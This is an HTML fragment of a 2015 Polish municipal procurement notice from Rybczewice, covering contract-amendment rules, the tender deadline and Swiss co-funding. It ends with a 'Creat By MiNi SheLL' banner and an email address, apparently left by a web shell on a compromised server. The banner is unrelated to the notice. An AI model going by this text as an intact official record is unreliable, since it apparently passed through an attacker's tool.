</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana istotnych postanowień niniejszej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, jest dopuszczalna w szczególnie uzasadnionych przypadkach, na zasadach wskazanych w ust. 2 - 9. 2.	Zmiana może obejmować: a) pominięcie jakiejkolwiek części usług (jednak bez prawa zlecenia jej osobom trzecim), b) zmiany w kolejności i terminach wykonywania usług. c) zmiana stawki i kwoty podatku VAT oraz wynagrodzenia określonego w § 5 ust. 1 umowy; 3. Zmiana może być wprowadzona jedną z następujących metod: a)	Wykonawca może zaproponować zmianę przez złożenie pisemnej propozycji zmiany, która zdaniem Wykonawcy w razie przyjęcia pozwoli skrócić okres realizacji umowy lub obniży koszty realizacji umowy lub w inny sposób będzie korzystna dla Zamawiającego. 
b) Zamawiający może przedłożyć propozycję zmiany, jeżeli jej wprowadzenie jest konieczne dla prawidłowej realizacji Projektu, i która w razie przyjęcia pozwoli skrócić okres realizacji umowy lub obniży koszty realizacji umowy lub w inny sposób będzie korzystna dla Zamawiającego lub jeżeli konieczność jej wprowadzenia wynika z decyzji krajowych lub zagranicznych Instytucji zarządzających i monitorujących realizację Projektu, ze zmiany prawa lub ze zmiany okoliczności, której nie można było przewidzieć w chwili zawarcia umowy. 4.	Każda ze stron przedkładając drugiej stronie propozycję zmiany, spełniającą wymogi określone w ust. 2, wraz z tą propozycją przedłoży: a) opis proponowanej zmiany, b) zakres proponowanej zmiany,
c) szacunki, czy i w jaki sposób zakładana zmiana wpłynie na termin realizacji przedmiotu umowy, oraz d) szacunki dotyczące wpływu zmiany na wynagrodzenie należne Wykonawcy wraz z uzasadnieniem.5. Po otrzymaniu propozycji, Wykonawca albo Zamawiający (w zależności od przypadku) w terminie 3 dni zatwierdzi bądź odrzuci otrzymaną propozycję zmiany bądź w tym terminie wystąpi do strony występującej z propozycją zmiany, przesyłając zmodyfikowaną propozycję zmiany, spełniającą wymogi opisane w ust. 3. 6. W przypadku upływu terminu podanego w ust. 5, traktuje się, iż propozycja wprowadzenia zmiany została odrzucona. 
7. Do przesłanej zmodyfikowanej propozycji zmiany mają zastosowanie postanowienia ust. 4-5. 8.	Stawka i kwota podatku VAT oraz wynagrodzenie brutto, ulegną zmianie odpowiednio do przepisów prawa wprowadzających tę zmianę, 9. Każda zmiana do umowy wymaga formy pisemnej i musi być dokonana poprzez sporządzenie zmiany do Umowy - Aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.rybczewice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rybczewice, Rybczewice Drugie 119, 21-065 Rybczewice pokój nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2015 godzina 12:00, miejsce: Sekretariat Urzędu Gminy Rybczewice pokój nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach projektu pn. Marka lokalna szansą rozwoju przedsiębiorczości na Szlacheckim Szlaku w województwie lubelskim współfinansowane przez Szwajcarię w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi Unii Europejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com